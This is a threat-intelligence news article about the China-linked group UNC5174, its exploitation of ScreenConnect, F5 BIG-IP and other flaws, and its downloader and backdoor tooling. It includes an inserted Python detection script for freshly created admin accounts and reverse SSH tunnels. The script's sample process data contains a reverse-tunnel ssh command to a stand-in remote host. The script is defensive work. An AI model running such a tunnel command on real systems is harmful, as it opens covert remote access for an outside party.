China-Linked Threat Cluster Exploits ConnectWise, F5 Software Vulnerabilities

March 22, 2024

A China-linked threat group tracked as UNC5174 (also known as Uteus or Uetus) has been exploiting security flaws in ConnectWise ScreenConnect and F5 BIG-IP software in a malicious campaign. Google-owned Mandiant assesses the actor to be a former member of Chinese hacktivist collectives who now appears to operate as a contractor for China's Ministry of State Security (MSS).

The actor has reportedly conducted extensive attacks on research and education institutions in Southeast Asia and the U.S., businesses in Hong Kong, charities, non-governmental organizations (NGOs), and government organizations in the U.S. and U.K. The activity took place between October and November 2023 and again in February 2024, the latter wave exploiting the ScreenConnect bug.

The threat actor gains initial access by exploiting known security flaws in Atlassian Confluence (CVE-2023-22518), ConnectWise ScreenConnect (CVE-2024-1709), F5 BIG-IP (CVE-2023-46747), the Linux kernel (CVE-2022-0185), and Zyxel devices (CVE-2022-3052). After a successful breach, the group performs extensive reconnaissance, scans internet-facing systems for further vulnerabilities, and creates administrative user accounts so that subsequent malicious actions run with elevated privileges.

The group deploys SNOWLIGHT, a C-based ELF downloader that fetches the next-stage payload, an obfuscated Golang backdoor named GOREVERSE, from a remote URL. GOREVERSE is linked to SUPERSHELL, an open-source command-and-control (C2) framework that lets attackers establish a reverse SSH tunnel and open interactive shell sessions to execute arbitrary code.

The threat actor also uses GOHEAVY, a Golang-based tunneling tool likely used to facilitate lateral movement within compromised networks, alongside publicly available tools such as afrog, DirBuster, Metasploit, Sliver, and sqlmap. In one notable instance, the actor applied mitigations for CVE-2023-46747 after gaining access, presumably to prevent other adversaries from exploiting the same vulnerability to get in.
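Two of the post-exploitation behaviours described above leave host-side traces that are cheap to check for: an account created and immediately added to an administrative group, and an ssh client process holding a remote (-R) port forward, which is the shape of a reverse SSH tunnel. The Python below is an added illustration of that detection logic, not code from Mandiant or from the tooling the report names. It assumes Debian/Ubuntu-style auth.log lines and `ps -eo pid,user,args` output; every log and process line in it is constructed sample data, not telemetry from the campaign.

```python
"""Added example: spot (1) a new account granted an admin group within a short
window and (2) ssh client processes requesting a remote port forward, then
correlate the two. All sample input below is constructed."""
import re
import shlex
from datetime import datetime

# Groups whose membership confers administrative rights on common Linux builds.
ADMIN_GROUPS = {"sudo", "wheel", "admin", "root"}

# Constructed auth.log lines (assumption: Debian/Ubuntu syslog format).
SAMPLE_AUTH_LOG = """\
Feb 21 03:14:02 edge01 useradd[4182]: new user: name=support, UID=1004, GID=1004, home=/home/support, shell=/bin/bash
Feb 21 03:14:03 edge01 usermod[4190]: add 'support' to group 'sudo'
Feb 21 03:14:03 edge01 usermod[4190]: add 'support' to shadow group 'sudo'
Feb 21 09:00:11 edge01 useradd[5120]: new user: name=backup, UID=1005, GID=1005, home=/var/backups, shell=/usr/sbin/nologin
Feb 21 09:30:40 edge01 usermod[5301]: add 'alice' to group 'docker'
"""

# Constructed `ps -eo pid,user,args` output (assumption about column layout).
SAMPLE_PS = """\
  PID USER     COMMAND
 4201 support  ssh -o StrictHostKeyChecking=no -N -R 2222:127.0.0.1:22 tunnel@198.51.100.7
 4310 alice    ssh -L 8080:localhost:80 bastion
 4422 root     /usr/sbin/sshd -D
"""

SYSLOG_TS = r"(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d)"
USERADD_RE = re.compile(SYSLOG_TS + r" \S+ useradd\[\d+\]: new user: name=(?P<user>[^,]+),")
# Both useradd -G and usermod -aG log the group addition in this shape.
GROUPADD_RE = re.compile(
    SYSLOG_TS + r" \S+ (?:useradd|usermod)\[\d+\]: add '(?P<user>[^']+)' to (?:shadow )?group '(?P<group>[^']+)'")
PS_RE = re.compile(r"^\s*(?P<pid>\d+)\s+(?P<user>\S+)\s+(?P<cmd>.+)$")


def _parse_ts(ts: str) -> datetime:
    # syslog timestamps carry no year; only deltas within one log are used,
    # so the default year from strptime is acceptable here.
    return datetime.strptime(ts, "%b %d %H:%M:%S")


def find_new_admin_accounts(auth_log: str, window_seconds: int = 300) -> list[str]:
    """Users created and then granted an admin group within window_seconds."""
    created: dict[str, datetime] = {}
    flagged: list[str] = []
    for line in auth_log.splitlines():
        if m := USERADD_RE.match(line):
            created[m["user"]] = _parse_ts(m["ts"])
        elif m := GROUPADD_RE.match(line):
            user, group = m["user"], m["group"]
            if group in ADMIN_GROUPS and user in created and user not in flagged:
                delta = (_parse_ts(m["ts"]) - created[user]).total_seconds()
                if 0 <= delta <= window_seconds:
                    flagged.append(user)
    return flagged


def _is_remote_forward(tok: str) -> bool:
    # -R alone, clustered with other flags (-NR), with its argument attached
    # (-R2222:...), or spelled as the RemoteForward option.
    cluster = re.fullmatch(r"-[A-Za-z]+", tok) is not None and "R" in tok
    return cluster or tok.startswith("-R") or "RemoteForward" in tok


def find_reverse_ssh_tunnels(ps_output: str) -> list[dict]:
    """ssh client processes whose argv requests a remote (-R) port forward."""
    hits = []
    for line in ps_output.splitlines():
        m = PS_RE.match(line)
        if not m:
            continue  # header or malformed line
        argv = shlex.split(m["cmd"])
        if not argv or argv[0].rsplit("/", 1)[-1] != "ssh":
            continue  # sshd and non-ssh processes are not of interest
        for i, tok in enumerate(argv[1:], start=1):
            if _is_remote_forward(tok):
                spec = argv[i + 1] if tok == "-R" and i + 1 < len(argv) else tok
                hits.append({"pid": int(m["pid"]), "user": m["user"],
                             "forward": spec, "target": argv[-1]})
                break
    return hits


def correlate(auth_log: str, ps_output: str) -> list[dict]:
    """High-confidence findings: a reverse tunnel owned by a freshly minted admin."""
    new_admins = set(find_new_admin_accounts(auth_log))
    return [t for t in find_reverse_ssh_tunnels(ps_output) if t["user"] in new_admins]


if __name__ == "__main__":
    print("new admin accounts:", find_new_admin_accounts(SAMPLE_AUTH_LOG))
    for t in find_reverse_ssh_tunnels(SAMPLE_PS):
        print(f"reverse tunnel pid={t['pid']} user={t['user']} forward={t['forward']} target={t['target']}")
    print("correlated:", correlate(SAMPLE_AUTH_LOG, SAMPLE_PS))
```

Run on the sample data, only `support` is flagged: it was added to `sudo` one second after creation and owns the ssh process with `-R 2222:127.0.0.1:22`, which publishes the host's own sshd on the remote end. The `-L` forward owned by `alice` and the `docker` group addition are deliberately left unflagged to show the checks are narrow; on a real fleet the account window and the admin group set are the two knobs to tune.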

Mandiant further assesses that UNC5174 was formerly a member of the Chinese hacktivist collective 'Dawn Calvary' and has collaborated with 'Genesis Day' / 'Xiaoqiying' and 'Teng Snake'. The individual appears to have left these groups in mid-2023 and has since focused on access operations, with the intention of brokering access to compromised environments.

The evidence suggests the actor operates as an initial access broker, and UNC5174 has even claimed MSS affiliation on dark web forums. Consistent with this, some of the same U.S. defense and U.K. government entities were simultaneously targeted by another access broker tracked as UNC302.

The findings highlight the ongoing efforts of Chinese nation-state groups to breach edge appliances by quickly adopting recently disclosed vulnerabilities for large-scale cyber espionage operations. 'UNC5174 has been observed attempting to sell access to U.S. defense contractor appliances, U.K. government entities, and institutions in Asia in late 2023 following CVE-2023-46747 exploitation,' Mandiant researchers said. 'There are similarities between UNC5174 and UNC302, which suggests they operate within an MSS initial access broker landscape. These similarities suggest possible shared exploits and operational priorities between these threat actors, although further investigation is required for definitive attribution.'

The disclosure comes as the MSS warned that an unnamed foreign hacking group had infiltrated 'hundreds' of Chinese business and government organizations by leveraging phishing emails and known security bugs to breach networks. The threat actor's name or origin was not disclosed.
